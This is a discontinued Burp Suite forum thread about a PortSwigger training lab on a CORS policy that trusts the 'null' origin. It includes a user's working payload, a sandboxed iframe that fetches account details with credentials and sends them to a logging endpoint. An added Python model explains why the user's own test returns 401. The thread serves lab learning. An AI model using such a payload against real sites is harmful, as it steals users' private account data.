The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

Lab CORS vulnerability with trusted null origin: CORS missing allow origin

filippo | Last updated: Feb 07, 2023 02:31PM UTC

Good evening, I'm struggling to solve the lab; it seems to me that the CORS policy is not configured according to the lab. Below is my HAR file, generated while trying to view the exploit. TIA

filippo | Last updated: Feb 08, 2023 07:46AM UTC

Good morning. Actually, the lab is solved: I mean that delivering the exploit to the victim works, and I can see the log entry containing the administrator data in the QS, but I cannot understand why my request is blocked when viewing the exploit. TIA, Filippo

Hannah, PortSwigger Agent | Last updated: Feb 08, 2023 10:02AM UTC

Hi. To clarify, when you click on the "View exploit" button, you are not landing on the log page with your API key in the URL? Have you tried following any of the video solutions available?

filippo | Last updated: Feb 08, 2023 03:39PM UTC

Hi Hannah, no, I didn't follow any solutions, apart from yours, which confirms, even if I used fetch instead of XHR, that my exploit is correct. As I wrote before, when I view the exploit I get a 401 response from the fetch request to the accountDetails page, and I see the iframe without any content loaded. Of course no related entry is present in the access log, but delivering the exploit to the victim solves the lab. Anyway, I don't understand why my fetch request is blocked. I enclose the payload I used:
<iframe style="visibility:block" sandbox="allow-scripts" srcdoc="<script> fetch('https://<my_lab_id>.web-security-academy.net/accountDetails', {credentials: 'include'}).then(response => response.text()).then((response) => document.location='/log?k='+encodeURIComponent(response));</script>"></iframe>
Thanks, F.
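As an added illustration (not code from this thread or from PortSwigger's lab), the Python model below separates the two things that can stop a cross-origin fetch: the server rejecting the request itself (the 401 reported in the post above, which is what a request without a session cookie gets) versus the browser withholding the response because no matching Access-Control-Allow-Origin header came back. It shows the lab's defect of trusting the literal "null" origin next to the hardened allow-list; the session id, API key and trusted origin are constructed placeholders, and the way the real lab server orders its checks is an assumption.

```python
# Constructed sample data (not real lab values).
VALID_SESSIONS = {"sess-admin-EXAMPLE": {"username": "administrator",
                                         "apikey": "APIKEY-PLACEHOLDER"}}
TRUSTED_ORIGINS = {"https://lab.example"}   # hypothetical allow-list


def account_details(headers, trust_null_origin):
    """Model of GET /accountDetails. Returns (status, response_headers, body).
    Assumption: authentication is checked first, so an unauthenticated caller
    gets a 401 that carries no CORS headers at all."""
    cookies = dict(c.split("=", 1)
                   for c in headers.get("Cookie", "").split("; ") if c)
    user = VALID_SESSIONS.get(cookies.get("session"))
    if user is None:
        return 401, {}, None
    origin = headers.get("Origin")
    resp = {}
    # The weak policy accepts "null", which any sandboxed srcdoc iframe
    # sends; the hardened policy only reflects an exact allow-listed origin.
    if origin in TRUSTED_ORIGINS or (trust_null_origin and origin == "null"):
        resp["Access-Control-Allow-Origin"] = origin
        resp["Access-Control-Allow-Credentials"] = "true"
    return 200, resp, user


def browser_can_read(request_origin, resp):
    """Browser-side CORS check for a credentialed fetch: the origin must match
    exactly ('*' is never accepted with credentials) and ACAC must be true."""
    acao = resp.get("Access-Control-Allow-Origin")
    return acao == request_origin and resp.get(
        "Access-Control-Allow-Credentials") == "true"


def simulate(session_cookie, trust_null_origin):
    """Outcome of the iframe's fetch (Origin: null) for one visitor.
    Returns (server_status, readable_by_page, leaked_apikey_or_None)."""
    headers = {"Origin": "null"}
    if session_cookie:
        headers["Cookie"] = "session=" + session_cookie
    status, resp, body = account_details(headers, trust_null_origin)
    readable = browser_can_read("null", resp)
    leaked = body["apikey"] if readable and body else None
    return status, readable, leaked


if __name__ == "__main__":
    print("victim, weak policy:   ", simulate("sess-admin-EXAMPLE", True))
    print("no session, weak policy:", simulate(None, True))
    print("victim, hardened policy:", simulate("sess-admin-EXAMPLE", False))
```

The second case is the situation in this thread: the request is not rejected by CORS at all; it never had a session cookie to present, so the server answers 401 before any CORS decision is made.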

Hannah, PortSwigger Agent | Last updated: Feb 14, 2023 11:55AM UTC